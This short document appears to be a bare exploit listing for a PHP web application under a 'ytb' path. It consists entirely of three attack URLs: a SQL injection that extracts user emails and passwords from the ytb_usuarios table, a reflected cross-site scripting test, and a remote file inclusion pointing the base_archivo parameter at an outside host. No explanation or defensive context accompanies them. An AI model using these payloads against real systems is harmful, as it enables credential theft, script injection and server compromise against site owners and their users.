http://www.example.com/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
http://www.example.com/ytb/mensaje.php?m=&amp;lt;script&amp;gt;alert(/xss/)&amp;lt;/script&amp;gt;
http://www.example.com/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt